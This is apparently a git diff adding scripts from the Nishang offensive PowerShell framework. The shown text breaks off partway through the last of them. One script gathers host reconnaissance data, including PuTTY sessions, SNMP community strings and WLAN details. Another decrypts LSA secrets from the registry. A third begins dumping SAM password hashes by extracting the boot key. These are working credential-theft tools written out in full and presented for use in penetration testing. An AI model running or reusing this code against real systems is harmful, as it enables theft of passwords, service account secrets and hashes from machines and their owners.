||||||
|
PS > Get-Information
|
||||||
|
|
||||||
|
Use above to execute the function.
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.blogspot.com/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Get-Information
|
||||||
|
{
|
||||||
|
[CmdletBinding()]
|
||||||
|
Param ()
|
||||||
|
|
||||||
|
function registry_values($regkey, $regvalue,$child)
|
||||||
|
{
|
||||||
|
if ($child -eq "no"){$key = get-item $regkey}
|
||||||
|
else{$key = get-childitem $regkey}
|
||||||
|
$key |
|
||||||
|
ForEach-Object {
|
||||||
|
$values = Get-ItemProperty $_.PSPath
|
||||||
|
ForEach ($value in $_.Property)
|
||||||
|
{
|
||||||
|
if ($regvalue -eq "all") {$values.$value}
|
||||||
|
elseif ($regvalue -eq "allname"){$value}
|
||||||
|
else {$values.$regvalue;break}
|
||||||
|
}}}
|
||||||
|
$output = "Logged in users:`n" + ((registry_values "hklm:\software\microsoft\windows nt\currentversion\profilelist" "profileimagepath") -join "`r`n")
|
||||||
|
$output = $output + "`n`n Powershell environment:`n" + ((registry_values "hklm:\software\microsoft\powershell" "allname") -join "`r`n")
|
||||||
|
$output = $output + "`n`n Putty trusted hosts:`n" + ((registry_values "hkcu:\software\simontatham\putty" "allname") -join "`r`n")
|
||||||
|
$output = $output + "`n`n Putty saved sessions:`n" + ((registry_values "hkcu:\software\simontatham\putty\sessions" "all") -join "`r`n")
|
||||||
|
$output = $output + "`n`n Recently used commands:`n" + ((registry_values "hkcu:\software\microsoft\windows\currentversion\explorer\runmru" "all" "no") -join "`r`n")
|
||||||
|
$output = $output + "`n`n Shares on the machine:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\LanmanServer\Shares" "all" "no") -join "`r`n")
|
||||||
|
$output = $output + "`n`n Environment variables:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" "all" "no") -join "`r`n")
|
||||||
|
$output = $output + "`n`n More details for current user:`n" + ((registry_values "hkcu:\Volatile Environment" "all" "no") -join "`r`n")
|
||||||
|
$output = $output + "`n`n SNMP community strings:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities" "all" "no") -join "`r`n")
|
||||||
|
$output = $output + "`n`n SNMP community strings for current user:`n" + ((registry_values "hkcu:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities" "all" "no") -join "`r`n")
|
||||||
|
$output = $output + "`n`n Installed Applications:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname") -join "`r`n")
|
||||||
|
$output = $output + "`n`n Installed Applications for current user:`n" + ((registry_values "hkcu:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname") -join "`r`n")
|
||||||
|
$output = $output + "`n`n Domain Name:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\" "all" "no") -join "`r`n")
|
||||||
|
$output = $output + "`n`n Contents of /etc/hosts:`n" + ((get-content -path "C:\windows\System32\drivers\etc\hosts") -join "`r`n")
|
||||||
|
$output = $output + "`n`n Running Services:`n" + ((net start) -join "`r`n")
|
||||||
|
$output = $output + "`n`n Account Policy:`n" + ((net accounts) -join "`r`n")
|
||||||
|
$output = $output + "`n`n Local users:`n" + ((net user) -join "`r`n")
|
||||||
|
$output = $output + "`n`n Local Groups:`n" + ((net localgroup) -join "`r`n")
|
||||||
|
$output = $output + "`n`n WLAN Info:`n" + ((netsh wlan show all) -join "`r`n")
|
||||||
|
$output
|
||||||
|
|
||||||
|
|
||||||
|
}
|
263
aspx/nishang/Gather/Get-LSASecret.ps1
Normal file
263
aspx/nishang/Gather/Get-LSASecret.ps1
Normal file
|
@ -0,0 +1,263 @@
|
||||||
|
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang payload which extracts LSA Secrets from local computer.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
Extracts LSA secrets from HKLM:\\SECURITY\Policy\Secrets\ on a local computer.
|
||||||
|
The payload must be run with elevated permissions, in 32-bit mode and requires
|
||||||
|
permissions to the security key in HKLM. The permission could be obtained by using
|
||||||
|
Enable-DuplicateToken payload.
|
||||||
|
|
||||||
|
.PARAMETER RegistryKey
|
||||||
|
Name of Key to Extract. if the parameter is not used, all secrets will be displayed.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Get-LsaSecret
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Get-LsaSecret -Key KeyName
|
||||||
|
Read contents of the key mentioned as parameter.
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://www.truesec.com
|
||||||
|
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/06/use-powershell-to-decrypt-lsa-secrets-from-the-registry.aspx
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
|
||||||
|
.NOTES
|
||||||
|
Goude 2012, TreuSec
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Get-LsaSecret {
|
||||||
|
[CmdletBinding()] Param (
|
||||||
|
[Parameter(Position = 0, Mandatory=$False)]
|
||||||
|
[String]
|
||||||
|
$RegistryKey
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
Begin {
|
||||||
|
# Check if User is Elevated
|
||||||
|
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
|
||||||
|
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true) {
|
||||||
|
Write-Warning "Run the Command as an Administrator"
|
||||||
|
Break
|
||||||
|
}
|
||||||
|
|
||||||
|
# Check if Script is run in a 32-bit Environment by checking a Pointer Size
|
||||||
|
if([System.IntPtr]::Size -eq 8) {
|
||||||
|
Write-Warning "Run PowerShell in 32-bit mode"
|
||||||
|
Break
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Check if RegKey is specified
|
||||||
|
if([string]::IsNullOrEmpty($registryKey)) {
|
||||||
|
[string[]]$registryKey = (Split-Path (Get-ChildItem HKLM:\SECURITY\Policy\Secrets | Select -ExpandProperty Name) -Leaf)
|
||||||
|
}
|
||||||
|
|
||||||
|
# Create Temporary Registry Key
|
||||||
|
if( -not(Test-Path "HKLM:\\SECURITY\Policy\Secrets\MySecret")) {
|
||||||
|
mkdir "HKLM:\\SECURITY\Policy\Secrets\MySecret" | Out-Null
|
||||||
|
}
|
||||||
|
|
||||||
|
$signature = @"
|
||||||
|
[StructLayout(LayoutKind.Sequential)]
|
||||||
|
public struct LSA_UNICODE_STRING
|
||||||
|
{
|
||||||
|
public UInt16 Length;
|
||||||
|
public UInt16 MaximumLength;
|
||||||
|
public IntPtr Buffer;
|
||||||
|
}
|
||||||
|
|
||||||
|
[StructLayout(LayoutKind.Sequential)]
|
||||||
|
public struct LSA_OBJECT_ATTRIBUTES
|
||||||
|
{
|
||||||
|
public int Length;
|
||||||
|
public IntPtr RootDirectory;
|
||||||
|
public LSA_UNICODE_STRING ObjectName;
|
||||||
|
public uint Attributes;
|
||||||
|
public IntPtr SecurityDescriptor;
|
||||||
|
public IntPtr SecurityQualityOfService;
|
||||||
|
}
|
||||||
|
|
||||||
|
public enum LSA_AccessPolicy : long
|
||||||
|
{
|
||||||
|
POLICY_VIEW_LOCAL_INFORMATION = 0x00000001L,
|
||||||
|
POLICY_VIEW_AUDIT_INFORMATION = 0x00000002L,
|
||||||
|
POLICY_GET_PRIVATE_INFORMATION = 0x00000004L,
|
||||||
|
POLICY_TRUST_ADMIN = 0x00000008L,
|
||||||
|
POLICY_CREATE_ACCOUNT = 0x00000010L,
|
||||||
|
POLICY_CREATE_SECRET = 0x00000020L,
|
||||||
|
POLICY_CREATE_PRIVILEGE = 0x00000040L,
|
||||||
|
POLICY_SET_DEFAULT_QUOTA_LIMITS = 0x00000080L,
|
||||||
|
POLICY_SET_AUDIT_REQUIREMENTS = 0x00000100L,
|
||||||
|
POLICY_AUDIT_LOG_ADMIN = 0x00000200L,
|
||||||
|
POLICY_SERVER_ADMIN = 0x00000400L,
|
||||||
|
POLICY_LOOKUP_NAMES = 0x00000800L,
|
||||||
|
POLICY_NOTIFICATION = 0x00001000L
|
||||||
|
}
|
||||||
|
|
||||||
|
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
|
||||||
|
public static extern uint LsaRetrievePrivateData(
|
||||||
|
IntPtr PolicyHandle,
|
||||||
|
ref LSA_UNICODE_STRING KeyName,
|
||||||
|
out IntPtr PrivateData
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
|
||||||
|
public static extern uint LsaStorePrivateData(
|
||||||
|
IntPtr policyHandle,
|
||||||
|
ref LSA_UNICODE_STRING KeyName,
|
||||||
|
ref LSA_UNICODE_STRING PrivateData
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
|
||||||
|
public static extern uint LsaOpenPolicy(
|
||||||
|
ref LSA_UNICODE_STRING SystemName,
|
||||||
|
ref LSA_OBJECT_ATTRIBUTES ObjectAttributes,
|
||||||
|
uint DesiredAccess,
|
||||||
|
out IntPtr PolicyHandle
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
|
||||||
|
public static extern uint LsaNtStatusToWinError(
|
||||||
|
uint status
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
|
||||||
|
public static extern uint LsaClose(
|
||||||
|
IntPtr policyHandle
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
|
||||||
|
public static extern uint LsaFreeMemory(
|
||||||
|
IntPtr buffer
|
||||||
|
);
|
||||||
|
"@
|
||||||
|
|
||||||
|
Add-Type -MemberDefinition $signature -Name LSAUtil -Namespace LSAUtil
|
||||||
|
}
|
||||||
|
|
||||||
|
Process{
|
||||||
|
foreach($key in $RegistryKey) {
|
||||||
|
$regPath = "HKLM:\\SECURITY\Policy\Secrets\" + $key
|
||||||
|
$tempRegPath = "HKLM:\\SECURITY\Policy\Secrets\MySecret"
|
||||||
|
$myKey = "MySecret"
|
||||||
|
if(Test-Path $regPath) {
|
||||||
|
Try {
|
||||||
|
Get-ChildItem $regPath -ErrorAction Stop | Out-Null
|
||||||
|
}
|
||||||
|
Catch {
|
||||||
|
Write-Error -Message "Access to registry Denied, run as NT AUTHORITY\SYSTEM" -Category PermissionDenied
|
||||||
|
Break
|
||||||
|
}
|
||||||
|
|
||||||
|
if(Test-Path $regPath) {
|
||||||
|
# Copy Key
|
||||||
|
"CurrVal","OldVal","OupdTime","CupdTime","SecDesc" | ForEach-Object {
|
||||||
|
$copyFrom = "HKLM:\SECURITY\Policy\Secrets\" + $key + "\" + $_
|
||||||
|
$copyTo = "HKLM:\SECURITY\Policy\Secrets\MySecret\" + $_
|
||||||
|
|
||||||
|
if( -not(Test-Path $copyTo) ) {
|
||||||
|
mkdir $copyTo | Out-Null
|
||||||
|
}
|
||||||
|
$item = Get-ItemProperty $copyFrom
|
||||||
|
Set-ItemProperty -Path $copyTo -Name '(default)' -Value $item.'(default)'
|
||||||
|
}
|
||||||
|
}
|
||||||
|
$Script:pastevalue
|
||||||
|
# Attributes
|
||||||
|
$objectAttributes = New-Object LSAUtil.LSAUtil+LSA_OBJECT_ATTRIBUTES
|
||||||
|
$objectAttributes.Length = 0
|
||||||
|
$objectAttributes.RootDirectory = [IntPtr]::Zero
|
||||||
|
$objectAttributes.Attributes = 0
|
||||||
|
$objectAttributes.SecurityDescriptor = [IntPtr]::Zero
|
||||||
|
$objectAttributes.SecurityQualityOfService = [IntPtr]::Zero
|
||||||
|
|
||||||
|
# localSystem
|
||||||
|
$localsystem = New-Object LSAUtil.LSAUtil+LSA_UNICODE_STRING
|
||||||
|
$localsystem.Buffer = [IntPtr]::Zero
|
||||||
|
$localsystem.Length = 0
|
||||||
|
$localsystem.MaximumLength = 0
|
||||||
|
|
||||||
|
# Secret Name
|
||||||
|
$secretName = New-Object LSAUtil.LSAUtil+LSA_UNICODE_STRING
|
||||||
|
$secretName.Buffer = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($myKey)
|
||||||
|
$secretName.Length = [Uint16]($myKey.Length * [System.Text.UnicodeEncoding]::CharSize)
|
||||||
|
$secretName.MaximumLength = [Uint16](($myKey.Length + 1) * [System.Text.UnicodeEncoding]::CharSize)
|
||||||
|
|
||||||
|
# Get LSA PolicyHandle
|
||||||
|
$lsaPolicyHandle = [IntPtr]::Zero
|
||||||
|
[LSAUtil.LSAUtil+LSA_AccessPolicy]$access = [LSAUtil.LSAUtil+LSA_AccessPolicy]::POLICY_GET_PRIVATE_INFORMATION
|
||||||
|
$lsaOpenPolicyHandle = [LSAUtil.LSAUtil]::LSAOpenPolicy([ref]$localSystem, [ref]$objectAttributes, $access, [ref]$lsaPolicyHandle)
|
||||||
|
|
||||||
|
if($lsaOpenPolicyHandle -ne 0) {
|
||||||
|
Write-Warning "lsaOpenPolicyHandle Windows Error Code: $lsaOpenPolicyHandle"
|
||||||
|
Continue
|
||||||
|
}
|
||||||
|
|
||||||
|
# Retrieve Private Data
|
||||||
|
$privateData = [IntPtr]::Zero
|
||||||
|
$ntsResult = [LSAUtil.LSAUtil]::LsaRetrievePrivateData($lsaPolicyHandle, [ref]$secretName, [ref]$privateData)
|
||||||
|
|
||||||
|
$lsaClose = [LSAUtil.LSAUtil]::LsaClose($lsaPolicyHandle)
|
||||||
|
|
||||||
|
$lsaNtStatusToWinError = [LSAUtil.LSAUtil]::LsaNtStatusToWinError($ntsResult)
|
||||||
|
|
||||||
|
if($lsaNtStatusToWinError -ne 0) {
|
||||||
|
Write-Warning "lsaNtsStatusToWinError: $lsaNtStatusToWinError"
|
||||||
|
}
|
||||||
|
|
||||||
|
[LSAUtil.LSAUtil+LSA_UNICODE_STRING]$lusSecretData =
|
||||||
|
[LSAUtil.LSAUtil+LSA_UNICODE_STRING][System.Runtime.InteropServices.marshal]::PtrToStructure($privateData, [LSAUtil.LSAUtil+LSA_UNICODE_STRING])
|
||||||
|
|
||||||
|
Try {
|
||||||
|
[string]$value = [System.Runtime.InteropServices.marshal]::PtrToStringAuto($lusSecretData.Buffer)
|
||||||
|
$value = $value.SubString(0, ($lusSecretData.Length / 2))
|
||||||
|
}
|
||||||
|
Catch {
|
||||||
|
$value = ""
|
||||||
|
}
|
||||||
|
|
||||||
|
if($key -match "^_SC_") {
|
||||||
|
# Get Service Account
|
||||||
|
$serviceName = $key -Replace "^_SC_"
|
||||||
|
Try {
|
||||||
|
# Get Service Account
|
||||||
|
$service = Get-WmiObject -Query "SELECT StartName FROM Win32_Service WHERE Name = '$serviceName'" -ErrorAction Stop
|
||||||
|
$account = $service.StartName
|
||||||
|
}
|
||||||
|
Catch {
|
||||||
|
$account = ""
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
$account = ""
|
||||||
|
}
|
||||||
|
|
||||||
|
# Return Object
|
||||||
|
$obj = New-Object PSObject -Property @{
|
||||||
|
Name = $key;
|
||||||
|
Secret = $value;
|
||||||
|
Account = $Account
|
||||||
|
}
|
||||||
|
|
||||||
|
$obj | Select-Object Name, Account, Secret, @{Name="ComputerName";Expression={$env:COMPUTERNAME}}
|
||||||
|
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
Write-Error -Message "Path not found: $regPath" -Category ObjectNotFound
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
end {
|
||||||
|
if(Test-Path $tempRegPath) {
|
||||||
|
Remove-Item -Path "HKLM:\\SECURITY\Policy\Secrets\MySecret" -Recurse -Force
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
400
aspx/nishang/Gather/Get-PassHashes.ps1
Normal file
400
aspx/nishang/Gather/Get-PassHashes.ps1
Normal file
|
@ -0,0 +1,400 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang payload which dumps password hashes.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
The payload dumps password hashes using the modified powerdump script from MSF. Administrator privileges are required for this script
|
||||||
|
(but not SYSTEM privs as for the original powerdump)
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Get-PassHashes
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html?showComment=1386725874167#c8513980725823764060
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
function Get-PassHashes {
|
||||||
|
[CmdletBinding()]
|
||||||
|
Param ()
|
||||||
|
|
||||||
|
|
||||||
|
#######################################powerdump written by David Kennedy#########################################
|
||||||
|
function LoadApi
|
||||||
|
{
|
||||||
|
$oldErrorAction = $global:ErrorActionPreference;
|
||||||
|
$global:ErrorActionPreference = "SilentlyContinue";
|
||||||
|
$test = [PowerDump.Native];
|
||||||
|
$global:ErrorActionPreference = $oldErrorAction;
|
||||||
|
if ($test)
|
||||||
|
{
|
||||||
|
# already loaded
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
$code = @'
|
||||||
|
using System;
|
||||||
|
using System.Security.Cryptography;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
using System.Text;
|
||||||
|
|
||||||
|
namespace PowerDump
|
||||||
|
{
|
||||||
|
public class Native
|
||||||
|
{
|
||||||
|
[DllImport("advapi32.dll", CharSet = CharSet.Auto)]
|
||||||
|
public static extern int RegOpenKeyEx(
|
||||||
|
int hKey,
|
||||||
|
string subKey,
|
||||||
|
int ulOptions,
|
||||||
|
int samDesired,
|
||||||
|
out int hkResult);
|
||||||
|
|
||||||
|
[DllImport("advapi32.dll", EntryPoint = "RegEnumKeyEx")]
|
||||||
|
extern public static int RegEnumKeyEx(
|
||||||
|
int hkey,
|
||||||
|
int index,
|
||||||
|
StringBuilder lpName,
|
||||||
|
ref int lpcbName,
|
||||||
|
int reserved,
|
||||||
|
StringBuilder lpClass,
|
||||||
|
ref int lpcbClass,
|
||||||
|
out long lpftLastWriteTime);
|
||||||
|
|
||||||
|
[DllImport("advapi32.dll", EntryPoint="RegQueryInfoKey", CallingConvention=CallingConvention.Winapi, SetLastError=true)]
|
||||||
|
extern public static int RegQueryInfoKey(
|
||||||
|
int hkey,
|
||||||
|
StringBuilder lpClass,
|
||||||
|
ref int lpcbClass,
|
||||||
|
int lpReserved,
|
||||||
|
out int lpcSubKeys,
|
||||||
|
out int lpcbMaxSubKeyLen,
|
||||||
|
out int lpcbMaxClassLen,
|
||||||
|
out int lpcValues,
|
||||||
|
out int lpcbMaxValueNameLen,
|
||||||
|
out int lpcbMaxValueLen,
|
||||||
|
out int lpcbSecurityDescriptor,
|
||||||
|
IntPtr lpftLastWriteTime);
|
||||||
|
|
||||||
|
[DllImport("advapi32.dll", SetLastError=true)]
|
||||||
|
public static extern int RegCloseKey(
|
||||||
|
int hKey);
|
||||||
|
|
||||||
|
}
|
||||||
|
} // end namespace PowerDump
|
||||||
|
|
||||||
|
public class Shift {
|
||||||
|
public static int Right(int x, int count) { return x >> count; }
|
||||||
|
public static uint Right(uint x, int count) { return x >> count; }
|
||||||
|
public static long Right(long x, int count) { return x >> count; }
|
||||||
|
public static ulong Right(ulong x, int count) { return x >> count; }
|
||||||
|
public static int Left(int x, int count) { return x << count; }
|
||||||
|
public static uint Left(uint x, int count) { return x << count; }
|
||||||
|
public static long Left(long x, int count) { return x << count; }
|
||||||
|
public static ulong Left(ulong x, int count) { return x << count; }
|
||||||
|
}
|
||||||
|
'@
|
||||||
|
|
||||||
|
$provider = New-Object Microsoft.CSharp.CSharpCodeProvider
|
||||||
|
$dllName = [PsObject].Assembly.Location
|
||||||
|
$compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters
|
||||||
|
$assemblies = @("System.dll", $dllName)
|
||||||
|
$compilerParameters.ReferencedAssemblies.AddRange($assemblies)
|
||||||
|
$compilerParameters.GenerateInMemory = $true
|
||||||
|
$compilerResults = $provider.CompileAssemblyFromSource($compilerParameters, $code)
|
||||||
|
if($compilerResults.Errors.Count -gt 0) {
|
||||||
|
$compilerResults.Errors | % { Write-Error ("{0}:`t{1}" -f $_.Line,$_.ErrorText) }
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
$antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0");
|
||||||
|
$almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0");
|
||||||
|
$empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee);
|
||||||
|
$empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0);
|
||||||
|
$odd_parity = @(
|
||||||
|
1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
|
||||||
|
16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
|
||||||
|
32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
|
||||||
|
49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
|
||||||
|
64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
|
||||||
|
81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
|
||||||
|
97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
|
||||||
|
112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
|
||||||
|
128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
|
||||||
|
145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
|
||||||
|
161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
|
||||||
|
176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
|
||||||
|
193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
|
||||||
|
208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
|
||||||
|
224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
|
||||||
|
241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
|
||||||
|
);
|
||||||
|
|
||||||
|
function sid_to_key($sid)
|
||||||
|
{
|
||||||
|
$s1 = @();
|
||||||
|
$s1 += [char]($sid -band 0xFF);
|
||||||
|
$s1 += [char]([Shift]::Right($sid,8) -band 0xFF);
|
||||||
|
$s1 += [char]([Shift]::Right($sid,16) -band 0xFF);
|
||||||
|
$s1 += [char]([Shift]::Right($sid,24) -band 0xFF);
|
||||||
|
$s1 += $s1[0];
|
||||||
|
$s1 += $s1[1];
|
||||||
|
$s1 += $s1[2];
|
||||||
|
$s2 = @();
|
||||||
|
$s2 += $s1[3]; $s2 += $s1[0]; $s2 += $s1[1]; $s2 += $s1[2];
|
||||||
|
$s2 += $s2[0]; $s2 += $s2[1]; $s2 += $s2[2];
|
||||||
|
return ,((str_to_key $s1),(str_to_key $s2));
|
||||||
|
}
|
||||||
|
|
||||||
|
function str_to_key($s)
|
||||||
|
{
|
||||||
|
$key = @();
|
||||||
|
$key += [Shift]::Right([int]($s[0]), 1 );
|
||||||
|
$key += [Shift]::Left( $([int]($s[0]) -band 0x01), 6) -bor [Shift]::Right([int]($s[1]),2);
|
||||||
|
$key += [Shift]::Left( $([int]($s[1]) -band 0x03), 5) -bor [Shift]::Right([int]($s[2]),3);
|
||||||
|
$key += [Shift]::Left( $([int]($s[2]) -band 0x07), 4) -bor [Shift]::Right([int]($s[3]),4);
|
||||||
|
$key += [Shift]::Left( $([int]($s[3]) -band 0x0F), 3) -bor [Shift]::Right([int]($s[4]),5);
|
||||||
|
$key += [Shift]::Left( $([int]($s[4]) -band 0x1F), 2) -bor [Shift]::Right([int]($s[5]),6);
|
||||||
|
$key += [Shift]::Left( $([int]($s[5]) -band 0x3F), 1) -bor [Shift]::Right([int]($s[6]),7);
|
||||||
|
$key += $([int]($s[6]) -band 0x7F);
|
||||||
|
0..7 | %{
|
||||||
|
$key[$_] = [Shift]::Left($key[$_], 1);
|
||||||
|
$key[$_] = $odd_parity[$key[$_]];
|
||||||
|
}
|
||||||
|
return ,$key;
|
||||||
|
}
|
||||||
|
|
||||||
|
function NewRC4([byte[]]$key)
|
||||||
|
{
|
||||||
|
return new-object Object |
|
||||||
|
Add-Member NoteProperty key $key -PassThru |
|
||||||
|
Add-Member NoteProperty S $null -PassThru |
|
||||||
|
Add-Member ScriptMethod init {
|
||||||
|
if (-not $this.S)
|
||||||
|
{
|
||||||
|
[byte[]]$this.S = 0..255;
|
||||||
|
0..255 | % -begin{[long]$j=0;}{
|
||||||
|
$j = ($j + $this.key[$($_ % $this.key.Length)] + $this.S[$_]) % $this.S.Length;
|
||||||
|
$temp = $this.S[$_]; $this.S[$_] = $this.S[$j]; $this.S[$j] = $temp;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
} -PassThru |
|
||||||
|
Add-Member ScriptMethod "encrypt" {
|
||||||
|
$data = $args[0];
|
||||||
|
$this.init();
|
||||||
|
$outbuf = new-object byte[] $($data.Length);
|
||||||
|
$S2 = $this.S[0..$this.S.Length];
|
||||||
|
0..$($data.Length-1) | % -begin{$i=0;$j=0;} {
|
||||||
|
$i = ($i+1) % $S2.Length;
|
||||||
|
$j = ($j + $S2[$i]) % $S2.Length;
|
||||||
|
$temp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $temp;
|
||||||
|
$a = $data[$_];
|
||||||
|
$b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ];
|
||||||
|
$outbuf[$_] = ($a -bxor $b);
|
||||||
|
}
|
||||||
|
return ,$outbuf;
|
||||||
|
} -PassThru
|
||||||
|
}
|
||||||
|
|
||||||
|
function des_encrypt([byte[]]$data, [byte[]]$key)
|
||||||
|
{
|
||||||
|
return ,(des_transform $data $key $true)
|
||||||
|
}
|
||||||
|
|
||||||
|
function des_decrypt([byte[]]$data, [byte[]]$key)
|
||||||
|
{
|
||||||
|
return ,(des_transform $data $key $false)
|
||||||
|
}
|
||||||
|
|
||||||
|
function des_transform([byte[]]$data, [byte[]]$key, $doEncrypt)
|
||||||
|
{
|
||||||
|
$des = new-object Security.Cryptography.DESCryptoServiceProvider;
|
||||||
|
$des.Mode = [Security.Cryptography.CipherMode]::ECB;
|
||||||
|
$des.Padding = [Security.Cryptography.PaddingMode]::None;
|
||||||
|
$des.Key = $key;
|
||||||
|
$des.IV = $key;
|
||||||
|
$transform = $null;
|
||||||
|
if ($doEncrypt) {$transform = $des.CreateEncryptor();}
|
||||||
|
else{$transform = $des.CreateDecryptor();}
|
||||||
|
$result = $transform.TransformFinalBlock($data, 0, $data.Length);
|
||||||
|
return ,$result;
|
||||||
|
}
|
||||||
|
|
||||||
|
function Get-RegKeyClass([string]$key, [string]$subkey)
|
||||||
|
{
|
||||||
|
switch ($Key) {
|
||||||
|
"HKCR" { $nKey = 0x80000000} #HK Classes Root
|
||||||
|
"HKCU" { $nKey = 0x80000001} #HK Current User
|
||||||
|
"HKLM" { $nKey = 0x80000002} #HK Local Machine
|
||||||
|
"HKU" { $nKey = 0x80000003} #HK Users
|
||||||
|
"HKCC" { $nKey = 0x80000005} #HK Current Config
|
||||||
|
default {
|
||||||
|
throw "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
$KEYQUERYVALUE = 0x1;
|
||||||
|
$KEYREAD = 0x19;
|
||||||
|
$KEYALLACCESS = 0x3F;
|
||||||
|
$result = "";
|
||||||
|
[int]$hkey=0
|
||||||
|
if (-not [PowerDump.Native]::RegOpenKeyEx($nkey,$subkey,0,$KEYREAD,[ref]$hkey))
|
||||||
|
{
|
||||||
|
$classVal = New-Object Text.Stringbuilder 1024
|
||||||
|
[int]$len = 1024
|
||||||
|
if (-not [PowerDump.Native]::RegQueryInfoKey($hkey,$classVal,[ref]$len,0,[ref]$null,[ref]$null,
|
||||||
|
[ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,0))
|
||||||
|
{
|
||||||
|
$result = $classVal.ToString()
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
Write-Error "RegQueryInfoKey failed";
|
||||||
|
}
|
||||||
|
[PowerDump.Native]::RegCloseKey($hkey) | Out-Null
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
Write-Error "Cannot open key";
|
||||||
|
}
|
||||||
|
return $result;
|
||||||
|
}
|
||||||
|
|
||||||
|
function Get-BootKey
|
||||||
|
{
|
||||||
|
$s = [string]::Join("",$("JD","Skew1","GBG","Data" | %{Get-RegKeyClass "HKLM" "SYSTEM\CurrentControlSet\Control\Lsa\$_"}));
|
||||||
|
$b = new-object byte[] $($s.Length/2);
|
||||||
|
0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)}
|
||||||
|
$b2 = new-object byte[] 16;
|
||||||
|
